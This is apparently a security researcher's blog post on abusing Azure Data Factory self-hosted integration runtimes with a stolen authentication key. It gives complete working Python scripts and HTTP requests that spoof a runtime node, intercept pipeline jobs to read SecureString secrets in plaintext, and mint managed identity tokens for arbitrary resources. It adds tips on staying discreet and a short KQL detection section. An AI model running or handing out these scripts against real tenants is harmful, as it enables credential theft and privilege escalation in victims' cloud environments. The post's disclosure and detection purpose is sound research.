Introduction

In this post, we will dive into Self-Hosted Integration Runtimes (SHIRs) and how to extract secrets from them without ever touching the host's disk.



Integration Runtimes are the compute behind Data Factory. They mostly act as data movers and data transformers, and they tend to have a significant amount of access to the systems around them. This means they often hold a lot of secrets: API keys, Service Principal client secrets, access tokens for various PaaS offerings, usernames and passwords, and even Managed Identities. However, as an attacker, it is not always clear how to get at these secrets. Often the runtime uses Managed Identities, or the secrets are stored as “SecureString” values in the Data Factory pipelines, which cannot be read through the Azure Portal or the ARM APIs.

SecureString storing a key: how can we read this value?

Karim El-Melhaoui at O3 Cyber recently posted about how these secrets are stored on a self-hosted integration runtime, and how to abuse the VM Run Command feature to move laterally and steal them. As that post shows, once you use a technique like this to gain access to the host itself, these secrets can be read off disk and decrypted using DPAPI.

One downside of this technique is that you are up against endpoint protection on that host as soon as you try to run code, which makes it more likely you will be caught. So how can we extract these secrets without touching the disk?

Second, Data Factories can have Managed Identities. Is there any way to steal managed identity tokens using a SHIR?

We will cover these topics in this blog post.

How Does a Self-Hosted Integration Runtime (SHIR) Work?

Keep in mind that an Integration Runtime is simply the compute resource behind Data Factory. Data Factory is an Azure service that allows developers to define “pipelines”, which contain the configuration for computational tasks that should be performed by an Integration Runtime.



For example, a Data Factory pipeline may be configured so that every 10 minutes, a request is made to the Graph API and the response is written to a Storage Account.

Poll Graph API Data Factory Setup

The actual execution of this task is performed on an Integration Runtime linked to the Data Factory.

There are several types of Integration Runtimes. Some are Microsoft-managed, while others are self-hosted. The Microsoft-managed runtimes are fully managed by Microsoft, and you have no access to the underlying compute outside of the pipeline tasks.

On the other hand, the self-hosted version can run anywhere, and its compute is fully managed by the Azure customer. Microsoft describes the different runtime types in its Data Factory documentation.

One of the consequences of using a self-hosted Integration Runtime is that the customer-managed system that runs the Integration Runtime needs to be able to receive commands from the Data Factory it is linked to.

Ultimately, it is this command channel that we will abuse in this post to steal secrets and managed identity tokens.

Managed Identities - A Curiosity in Data Factories

While digging into how the SHIR works, one capability stood out as “different” compared to other Azure services: a SHIR can access Azure services using the Data Factory's managed identity.

Normally, fetching a managed identity token requires local access to the compute resource the identity is assigned to. The standard way to do this is to query a “metadata service endpoint” exposed by the Azure compute service, such as the Instance Metadata Service (IMDS) at 169.254.169.254 on virtual machines. However, that is not an option for a SHIR, because the customer-managed machine it runs on has no such metadata service for the Data Factory's identity.

This implies two very interesting properties from an attacker’s perspective, which we will come back to:

- A SHIR can somehow fetch tokens for a Data Factory's Managed Identities from a customer-managed system.

- Every SHIR connected to a Data Factory can use every RBAC permission assigned to that Data Factory's managed identities.
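For contrast, here is a minimal sketch of the standard metadata-service flow that a SHIR cannot use: a workload on an Azure VM asks IMDS for a managed identity token. It only builds the request (the documented IMDS token endpoint, `api-version`, and the required `Metadata: true` header) and does not send it, since IMDS is only reachable from inside an Azure VM. The function name is illustrative.

```python
from urllib.parse import urlencode

# Standard IMDS token endpoint on Azure VMs; link-local, so only reachable from inside the VM.
IMDS_TOKEN_ENDPOINT = "http://169.254.169.254/metadata/identity/oauth2/token"


def build_imds_token_request(resource: str, api_version: str = "2018-02-01") -> tuple[str, dict[str, str]]:
    """Return the URL and headers a VM workload would use to ask IMDS for a managed identity token."""
    query = urlencode({"api-version": api_version, "resource": resource})
    # IMDS rejects token requests that do not carry this header.
    headers = {"Metadata": "true"}
    return f"{IMDS_TOKEN_ENDPOINT}?{query}", headers


if __name__ == "__main__":
    # Build (but do not send) a request for an ARM token.
    url, headers = build_imds_token_request("https://management.azure.com/")
    print(url)
    print(headers)
```

The point of the comparison: this request only works from the VM itself, whereas the SHIR obtains tokens by asking the Data Factory service over the network.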

Reversing the SHIR

To learn how to abuse the SHIR's command channel, we first need to figure out how it works. Luckily, this is quite simple.

The SHIR can be downloaded from Microsoft: Self-Hosted Integration Runtime Download.



After installing it, you are prompted to enter an Authentication Key. This is a unique key for each SHIR, which is created when a new SHIR is added to a Data Factory:

Authentication Key after adding a New SHIR

This is interesting, because it implies that this single value is all that is needed to establish the command channel with the Data Factory.





We can observe this command channel being established by configuring Burp Suite as the SHIR's proxy:

Establish Command Channel

Once the command channel is established, the SHIR polls the following endpoint for jobs:

https://[dataFactoryName].westeurope.datafactory.azure.net/subscriptions/[dfSubscriptionId]/we/tasks/next

Note that dfSubscriptionId is the Azure Subscription ID that the Data Factory resides in.

Get Jobs

This is an internal Data Factory API, which is authenticated with the token returned by an earlier request to:

https://[dataFactoryName].westeurope.datafactory.azure.net/subscriptions/00000000-0000-0000-0000-000000000000/authservice/ams/acquiretoken

The request to “acquiretoken” has an authorization header:

Authorization: UserKey [b64string]

which, when base64-decoded, contains our Authentication Key along with a few additional parameters that can also be found in the Data Factory configuration in Azure (the Data Factory name and the integration runtime's ID):

ams#testingcody#1c99a9f1-db0c-4c0a-a8e2-dbff4785caaf#[redacted - key]
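As a minimal sketch of how this header is put together, the code below splits an authentication key into its parts and rebuilds the `UserKey` value. The `@`-separated key layout is an assumption inferred from the scripts at the end of this post, the URL-safe base64 encoding matches what those scripts use, and the sample key in the test is made up.

```python
import base64


def parse_auth_key(auth_key: str) -> dict[str, str]:
    """Split a SHIR authentication key into its parts.

    Assumed layout (inferred from the scripts at the end of this post):
    <prefix>@<IR instance ID>@<factory name>@ServiceEndpoint=<hostname>@<key>
    """
    _prefix, ir_instance_id, factory_name, service_endpoint, key = auth_key.split("@")
    return {
        "ir_instance_id": ir_instance_id,
        "factory_name": factory_name,
        "hostname": service_endpoint.split("=", 1)[1],
        "key": key,
    }


def build_user_key_header(factory_name: str, ir_instance_id: str, key: str) -> str:
    """Build the Authorization header value: 'UserKey ' + base64("ams#<factory>#<IR ID>#<key>")."""
    raw = f"ams#{factory_name}#{ir_instance_id}#{key}".encode()
    return "UserKey " + base64.urlsafe_b64encode(raw).decode()


def decode_user_key_header(header_value: str) -> list[str]:
    """Reverse build_user_key_header, e.g. to inspect a header captured in Burp."""
    scheme, _, encoded = header_value.partition(" ")
    if scheme != "UserKey":
        raise ValueError(f"unexpected scheme: {scheme!r}")
    # maxsplit=3 keeps the key intact even if it were to contain '#'
    return base64.urlsafe_b64decode(encoded).decode().split("#", 3)
```

Decoding a captured header this way should yield the four `#`-separated fields shown above.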

In short, the Authentication Key for a SHIR can be used to do the following:

- Get a data factory token via a POST request to:

https://[dataFactoryName].westeurope.datafactory.azure.net/subscriptions/00000000-0000-0000-0000-000000000000/authservice/ams/acquiretoken

- Use the data factory token to poll for new jobs from the command channel, using a GET request to:

https://[dataFactoryName].westeurope.datafactory.azure.net/subscriptions/[dfSubscriptionId]/we/tasks/next

There are actually several more steps involved here: Data Factory allows several nodes to exist for one SHIR in a high-availability setup. New nodes can be registered using the token. This means that a node needs to be registered, the connection needs to be established, and the node needs to report that it is online.

A script containing all of these steps is included at the end of this post.
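The registration and polling sequence can be summarized as a list of request paths. This is a hypothetical helper that only mirrors the requests made by the spoofing script at the end of this post: that script uses the token's `PartitionId` in both the `/tenants/` and `/subscriptions/` positions, and `we` appears to be the region short code for West Europe. The polling request also needs the extra query parameters shown in the script (`queueid`, `workerid`, and so on).

```python
# Hypothetical helper: the step list mirrors the requests in the spoofing script at the end of this post.
NODE_BASE = "/tenants/{partition_id}/gateways/{ir_id}/nodes"

SHIR_STEPS = [
    ("register node", "POST", NODE_BASE + "?api-version=1.0"),
    ("establish connection", "POST", NODE_BASE + "/{node_id}/establishconnection?api-version=1.0"),
    ("report status", "POST", NODE_BASE + "/{node_id}/reportstatus?api-version=1.0"),
    ("initialize", "POST", NODE_BASE + "/{node_id}/initialize?api-version=1.0"),
    ("poll for jobs", "GET", "/subscriptions/{partition_id}/{region}/tasks/next?api-version=2014-06-26"),
]


def render_steps(partition_id: str, ir_id: str, node_id: str, region: str = "we") -> list[tuple[str, str, str]]:
    """Fill in the path templates. node_id is only known once the register step returns instanceId."""
    values = {"partition_id": partition_id, "ir_id": ir_id, "node_id": node_id, "region": region}
    # str.format ignores keys a template does not use
    return [(name, method, template.format(**values)) for name, method, template in SHIR_STEPS]


if __name__ == "__main__":
    for name, method, path in render_steps("<PartitionId>", "<IR ID>", "<instanceId>"):
        print(f"{method:4} {path}  # {name}")
```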



Extracting Secrets from the IR

Now that we know how to impersonate a SHIR, we can poll for new commands. When we receive these commands, any SecureString or Password value that cannot be read through the ARM APIs or Azure Portal can be found in plaintext. An example of this can be found below:

Secrets in Plaintext

If any SecureString parameters are used in this job, we will see those secrets in plaintext in the output. However, note that only the parameters a job actually uses are sent to the SHIR, so if the pipeline definition does not reference a parameter, it will not be captured here.

Note: One thing to be aware of if you try this technique is that you have effectively “stolen” the command from the queue. Once you read a command, it disappears from the queue for some time; after around three minutes, it is re-added. To be discreet, it is a good idea to capture commands for a few minutes at a time, then pause for a while to limit the noticeable impact on the application.

Extracting tokens from Managed Identities using a SHIR

Often, Data Factories use managed identities to connect to other Azure services. As noted above, the SHIR also has access to these managed identities, and can fetch tokens.

The request used to generate this token looks like the following:

```http
POST /subscriptions/00000000-0000-0000-0000-000000000000/entities/[Entity ID]/identities/00000000-0000-0000-0000-000000000000/token?api-version=2019-09-01 HTTP/2
Host: testingcody.westeurope.datafactory.azure.net
Authorization: Bearer [Data Factory Token]
Content-Type: application/json; charset=utf-8
Content-Length: 160
Expect: 100-continue

{
  "resource": "[OAuth Resource]",
  "entityName": "[Data Factory Name]",
  "executionContextRestricted": true,
  "executionContextVersion": "2024-01-01"
}
```

This request requires two parameters from the data factory:

- The data factory token. This is the same token we fetched in the previous section.

- The “Entity ID”. This is the DataFactoryId value in the decoded data factory token, which looks like the following once base64-decoded:

```json
{"Header":{"Version":1,"SigningKeyId":"65FD82394FF1230FEFE496DC8EE15F4335F9CEA8"},"ContentString":"{\"RelyingPartyId\":\"ams\",\"ContainerId\":\"testingcody\",\"Id\":\"1c99a9f1-db0c-4c0a-a8e2-dbff4785caaf\",\"Policy\":{\"PermitAccessItems\":[],\"Restrictions\":[],\"Declarations\":[{\"Key\":\"GatewayIdentity\",\"Value\":\"{\\\"AadTenantId\\\":\\\"00000000-0000-0000-0000-000000000000\\\",\\\"PartitionId\\\":\\\"e6f642b6-f964-489b-9305-364cf6e718f3\\\",\\\"Region\\\":\\\"we\\\",\\\"GatewayId\\\":\\\"1c99a9f1-db0c-4c0a-a8e2-dbff4785caaf\\\",\\\"GatewayInstanceId\\\":\\\"00000000-0000-0000-0000-000000000000\\\",\\\"ExtendedProperties\\\":{\\\"DataFactory\\\":\\\"testingcody\\\",\\\"DataFactoryId\\\":\\\"3d193a2f-f3df-43b3-a30d-be7dc88ba151\\\",\\\"IntegrationRuntime\\\":\\\"integrationRuntime1\\\",\\\"KeyType\\\":\\\"SelfHostIRAuthKey\\\",\\\"InteractiveTaskQueueId\\\":\\\"9d951cf2-6152-4a93-b281-9eebf256ba5d\\\",\\\"QueueId\\\":\\\"00000000-0000-0000-0000-000000000000\\\"},\\\"QueueId\\\":\\\"00000000-0000-0000-0000-000000000000\\\",\\\"IdentityType\\\":0}\"}],\"TokenExpiration\":null},\"ValidFrom\":\"2024-11-22T16:48:12.706206Z\",\"ValidTo\":\"2024-11-22T17:48:12.706206Z\",\"Salt\":null}","Signature":"signature string redacted"}
```
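The token above nests JSON three levels deep: the outer document, the `ContentString`, and the `GatewayIdentity` declaration's `Value`. A minimal sketch of unwrapping it to get the Entity ID (and the `PartitionId` the scripts also use) follows. Unlike the scripts at the end of this post, it looks the declaration up by `Key` instead of assuming it is first, and re-adds base64 padding in case it was stripped; both are defensive assumptions. The function name is illustrative.

```python
import base64
import json


def extract_entity_ids(data_factory_token: str) -> dict[str, str]:
    """Unwrap the nested JSON in a Data Factory token and return the IDs used by later requests."""
    padded = data_factory_token + "=" * (-len(data_factory_token) % 4)
    # Layer 1: the base64-decoded token is a JSON document
    outer = json.loads(base64.b64decode(padded))
    # Layer 2: ContentString is itself a JSON document encoded as a string
    content = json.loads(outer["ContentString"])
    # Layer 3: the GatewayIdentity declaration's Value is yet another JSON string
    declarations = content["Policy"]["Declarations"]
    gateway = next(d for d in declarations if d["Key"] == "GatewayIdentity")
    identity = json.loads(gateway["Value"])
    return {
        "DataFactoryId": identity["ExtendedProperties"]["DataFactoryId"],  # the "Entity ID"
        "DataFactory": identity["ExtendedProperties"]["DataFactory"],      # used as "entityName"
        "PartitionId": identity["PartitionId"],
    }
```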

With those values, Managed Identity OAuth2 tokens can be generated for any OAuth resource in the tenant:

Request:

```http
POST /subscriptions/00000000-0000-0000-0000-000000000000/entities/3d193a2f-f3df-43b3-a30d-be7dc88ba151/identities/00000000-0000-0000-0000-000000000000/token?api-version=2019-09-01 HTTP/2
Host: testingcody.westeurope.datafactory.azure.net
Authorization: Bearer [redacted]
Content-Type: application/json; charset=utf-8
Content-Length: 160
Expect: 100-continue

{
  "resource": "https://vault.azure.net",
  "entityName": "testingcody",
  "executionContextRestricted": true,
  "executionContextVersion": "2024-01-01"
}
```

Response:

```http
HTTP/2 200 OK
Server: openresty/1.21.4.3
Date: Fri, 22 Nov 2024 18:57:53 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 1625
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Aspnet-Version: 4.0.30319
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
Strict-Transport-Security: max-age=15724800; includeSubDomains

{"accessToken":"eyJ0eX...redacted for brevity...","expiresAt":"2024-11-23T13:57:52.1543685Z"}
```

Note that this will work for the ARM API, Graph API, or any resource that you would normally assign managed identity permissions to.
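The returned `accessToken` is a JWT (note the `eyJ0eX` prefix), so you can check locally which resource it is scoped to (the `aud` claim) and which identity it represents (for example `oid`). A minimal standard-library sketch follows; it does not verify the signature, so it is only suitable for inspection. The function name is illustrative.

```python
import base64
import json


def peek_jwt_claims(access_token: str) -> dict:
    """Decode a JWT's payload segment WITHOUT verifying its signature (inspection only)."""
    payload = access_token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # JWT segments drop base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))
```

For the Key Vault request above, `peek_jwt_claims(response["accessToken"])["aud"]` should identify the vault resource.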

Abuse Patterns

Based on the techniques above, there are a few “patterns” that can be used to abuse a SHIR.

- Register a new SHIR on a Data Factory, and use its authentication key to fetch tokens for the Data Factory's managed identities

- Use an existing SHIR's authentication key to steal commands from the Data Factory and extract secrets

- Register a new SHIR, and create a new Data Factory pipeline that uses it. In the pipeline definition, reference all SecureString parameters in the job, so that they can be extracted using the new SHIR's authentication key.

There are probably many more ways to abuse this, such as in persistence scenarios, but these are the most obvious.

Scripting out the Abuse

I have added this to azol, a Python library for Azure security testing.

To install, simply run:

```shell
pip install azol
```

To use azol to get a token for a managed identity, use DataFactoryClient.get_managed_identity_token():

```python
from azol import DataFactoryClient

ir_auth_key = "insert key"
oauth_resource = "https://management.azure.com/"

df_client = DataFactoryClient(ir_auth_key)
token = df_client.get_managed_identity_token(oauth_resource)
print(token)
```

To spoof an integration runtime with azol, use DataFactoryClient.spoof_shir():

```python
from azol import DataFactoryClient

ir_auth_key = "insert key"
oauth_resource = "https://management.azure.com/"

df_client = DataFactoryClient(ir_auth_key)
df_client.spoof_shir()
```

Alternatively, the following standalone scripts do the same without azol:

Getting a managed identity token:

```python
from pprint import pprint
from base64 import b64decode, urlsafe_b64encode
import json

import requests

########### parameters #############
shir_auth_key = "insert auth key"
oauth_resource = "https://vault.azure.net"
########### parameters #############

# The authentication key is "@"-separated; the first field is not needed.
(_, ir_instance_id, dataFactory_name, service_endpoint, key) = shir_auth_key.split("@")
dataFactory_hostname = service_endpoint.split("=")[1]
dataFactory_url = f"https://{dataFactory_hostname}"

user_key_template = f"ams#{dataFactory_name}#{ir_instance_id}#{key}".encode()
b64_encoded_key = urlsafe_b64encode(user_key_template).decode()

# Get Data Factory Bearer Token
headers = {
    "Authorization": f"UserKey {b64_encoded_key}",
    "Content-Type": "application/json",
}
body = b64_encoded_key
response = requests.post(
    dataFactory_url + "/subscriptions/00000000-0000-0000-0000-000000000000/authservice/ams/acquiretoken",
    headers=headers, json=body)
response.raise_for_status()
data_factory_token = response.json()

# Decode the token and extract the Data Factory ID (the "Entity ID" in the token request)
decoded_df_token = b64decode(data_factory_token).decode()
df_token_dict = json.loads(decoded_df_token)
df_token_content = json.loads(df_token_dict["ContentString"])
declarations_dict = json.loads(df_token_content["Policy"]["Declarations"][0]["Value"])
data_factory_id = declarations_dict["ExtendedProperties"]["DataFactoryId"]

# Get a managed identity token using the data factory token
headers = {
    "Authorization": f"Bearer {data_factory_token}"
}
body = {
    "resource": oauth_resource,
    "entityName": dataFactory_name,
    "executionContextRestricted": True,
    "executionContextVersion": "2024-01-01"
}
query_params = {
    "api-version": "2019-09-01"
}
request_url = f"https://{dataFactory_hostname}/subscriptions/00000000-0000-0000-0000-000000000000/entities/{data_factory_id}/identities/00000000-0000-0000-0000-000000000000/token"
response = requests.post(request_url, headers=headers, params=query_params, json=body)
pprint(response.json())
```

Spoof a SHIR and dump commands to stdout:

```python
from pprint import pprint
from base64 import b64decode, urlsafe_b64encode
from time import sleep
import json
import uuid

import requests

########### parameters #############
shir_auth_key = "insert IR Authentication Key"
spoofed_ir_name = "SpoofedNodeName"
########### parameters #############

worker_guid = str(uuid.uuid4())

# The authentication key is "@"-separated; the first field is not needed.
(_, ir_instance_id, dataFactory_name, service_endpoint, key) = shir_auth_key.split("@")
dataFactory_hostname = service_endpoint.split("=")[1]
dataFactory_url = f"https://{dataFactory_hostname}"
user_key_template = f"ams#{dataFactory_name}#{ir_instance_id}#{key}".encode()
b64_encoded_key = urlsafe_b64encode(user_key_template).decode()

# Get Data Factory Bearer Token
headers = {
    "Authorization": f"UserKey {b64_encoded_key}",
    "Content-Type": "application/json",
}
body = b64_encoded_key
response = requests.post(dataFactory_url + "/subscriptions/00000000-0000-0000-0000-000000000000/authservice/ams/acquiretoken",
                         headers=headers, json=body)
response.raise_for_status()
data_factory_token = response.json()

# Decode the token and extract the Azure subscription ID of the Data Factory
decoded_df_token = b64decode(data_factory_token).decode()
df_token_dict = json.loads(decoded_df_token)
df_token_content = json.loads(df_token_dict["ContentString"])
declarations_dict = json.loads(df_token_content["Policy"]["Declarations"][0]["Value"])
subscription_id = declarations_dict["PartitionId"]

# Version reported by the spoofed node (the same values are sent in every request below)
gateway_version = {"major": 5, "minor": 48, "build": 9076, "revision": 1, "majorRevision": 0, "minorRevision": 1}
nodes_url = f"{dataFactory_url}/tenants/{subscription_id}/gateways/{ir_instance_id}/nodes"

# Register a new node. This tells the Data Factory that a SHIR node is connected.
headers = {
    "Authorization": f"Bearer {data_factory_token}",
    "X-Ms-Gateway-Machine-Id": str(uuid.uuid4()),
}
body = {"gatewayVersion": gateway_version, "machineName": spoofed_ir_name, "nodeName": spoofed_ir_name}
response = requests.post(f"{nodes_url}?api-version=1.0", json=body, headers=headers)
node_id = response.json()["instanceId"]

# Establish the connection; the response contains the public key sent back in the initialize request
body = {"gatewayVersion": gateway_version, "machineName": spoofed_ir_name}
response = requests.post(f"{nodes_url}/{node_id}/establishconnection?api-version=1.0", json=body, headers=headers)
public_key = response.json()["publicKey"]

# Report that the node is online
body = {"serviceBusConnected": None, "httpsPortEnabled": True, "workerActivated": True}
requests.post(f"{nodes_url}/{node_id}/reportstatus?api-version=1.0", json=body, headers=headers)

# Send initialize request
body = {"gatewayVersion": gateway_version, "nodeName": spoofed_ir_name, "publicKey": public_key, "coreInitialized": True}
requests.post(f"{nodes_url}/{node_id}/initialize?api-version=1.0", json=body, headers=headers)

# Poll for jobs every 5 seconds and print the job properties when one is found.
# The decoded token shown earlier is valid for one hour; this loop does not refresh it.
poll_headers = {"Authorization": f"Bearer {data_factory_token}"}
query_params = {
    "issecondary": False,
    "queueid": ir_instance_id,
    "count": 1,
    "workerid": worker_guid,
    "api-version": "2014-06-26",
}
while True:
    print("Polling for jobs...")
    # "we" appears to be the region short code (West Europe); adjust for other regions
    response = requests.get(f"{dataFactory_url}/subscriptions/{subscription_id}/we/tasks/next",
                            headers=poll_headers, params=query_params)
    # 204 No Content means there is no job waiting in the queue
    if response.status_code != 204:
        print("Got Job.")
        for job in response.json():
            input_data = json.loads(job["InputData"])
            pprint(input_data["Properties"])
    sleep(5)
```

Required Permissions

To run either of the scripts above, you only need the SHIR authentication key. It may turn up in source code, for example, but more likely you will need to retrieve it from Azure.

To get a SHIR authentication key, you must call the following API:

POST https://management.azure.com/subscriptions/[subscription_id]/resourcegroups/[resource_group]/providers/Microsoft.DataFactory/factories/[factory_name]/integrationruntimes/[ir_name]/listAuthKeys?api-version=2018-06-01

This API is authorized via Azure RBAC. To call it, you need a role assignment whose role definition includes the following action:

Microsoft.DataFactory/factories/integrationruntimes/listauthkeys/action

The roles that contain this action by default are the following:

- Owner

- Contributor

- Data Factory Contributor
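To audit which roles in your own environment grant this action, custom roles included, you can check each role definition's `Actions` and `NotActions`. A simplified sketch: it compares case-insensitively and treats `*` as a wildcard. It ignores scope, deny assignments, and conditions, so treat a hit as a lead rather than a complete answer. The function names and sample definitions are illustrative; Owner and Contributor, for instance, both use `Actions: ["*"]`.

```python
from fnmatch import fnmatchcase

LIST_AUTH_KEYS = "Microsoft.DataFactory/factories/integrationruntimes/listauthkeys/action"


def _matches(pattern: str, action: str) -> bool:
    # Simplification: case-insensitive comparison with '*' as a wildcard.
    # (fnmatch also treats '?' and '[' specially; RBAC action strings do not use them.)
    return fnmatchcase(action.lower(), pattern.lower())


def grants_action(actions: list[str], not_actions: list[str], action: str = LIST_AUTH_KEYS) -> bool:
    """True if a role definition's Actions include `action` and its NotActions do not remove it."""
    allowed = any(_matches(p, action) for p in actions)
    removed = any(_matches(p, action) for p in not_actions)
    return allowed and not removed
```

Feeding it the `Actions`/`NotActions` of every role definition in a subscription gives a quick list of roles that can read SHIR authentication keys.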

Detection

The Data Factory command channel does not produce any logs that are visible to the customer. This means that requests against this API, including capturing commands and requesting managed identity tokens through it, cannot be detected directly.

However, there are several other actions that are logged and can be monitored:

- If a new SHIR is created, this will appear in the Activity Logs of the Azure Subscription. This would be helpful for forensics, but it would be hard to produce an alarm based on this.

- Application-level logging: if a SHIR is taking an unusually long time to process requests, it could indicate that the requests are being captured. This is also difficult to implement as an alarm, and it requires application-specific monitoring.

- Creation of a Managed Identity token from Data Factory: the issued tokens are recorded in the managed identity sign-in logs in Microsoft Entra ID. Consider creating an alarm if a Data Factory managed identity requests a token for an unusual OAuth resource. In Sentinel, this KQL query will get you started:

```kql
AADManagedIdentitySignInLogs
| where ServicePrincipalId in ("data factory MI ID 1", "data factory MI ID 2")
| where ResourceDisplayName !in ("Azure Storage", "Azure Key Vault", "Azure SQL Database", "Microsoft.EventHubs", "Microsoft.ServiceBus")
```

The downside of this alarm is that you need to keep track of the managed identity object IDs for all Data Factories, as well as which OAuth resources each managed identity is expected to access. This is impractical in many cases.
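One way to reduce the manual bookkeeping for the resource list is to derive it from history. This is a minimal sketch, assuming the sign-in rows have been exported (for example, from the query above without the resource filter) as dictionaries with the `ServicePrincipalId` and `ResourceDisplayName` columns. You still need the set of Data Factory managed identity IDs to watch, and a new but legitimate resource will be flagged until it enters the baseline. The function names are illustrative.

```python
from collections import defaultdict
from typing import Iterable


def build_baseline(history: Iterable[dict]) -> dict[str, set[str]]:
    """Map each managed identity (ServicePrincipalId) to the resources it has requested tokens for."""
    baseline = defaultdict(set)
    for row in history:
        baseline[row["ServicePrincipalId"]].add(row["ResourceDisplayName"])
    return dict(baseline)


def find_unusual(recent: Iterable[dict], baseline: dict[str, set[str]], watched: set[str]) -> list[dict]:
    """Return recent sign-ins by watched identities to resources outside their baseline."""
    return [
        row for row in recent
        if row["ServicePrincipalId"] in watched
        and row["ResourceDisplayName"] not in baseline.get(row["ServicePrincipalId"], set())
    ]
```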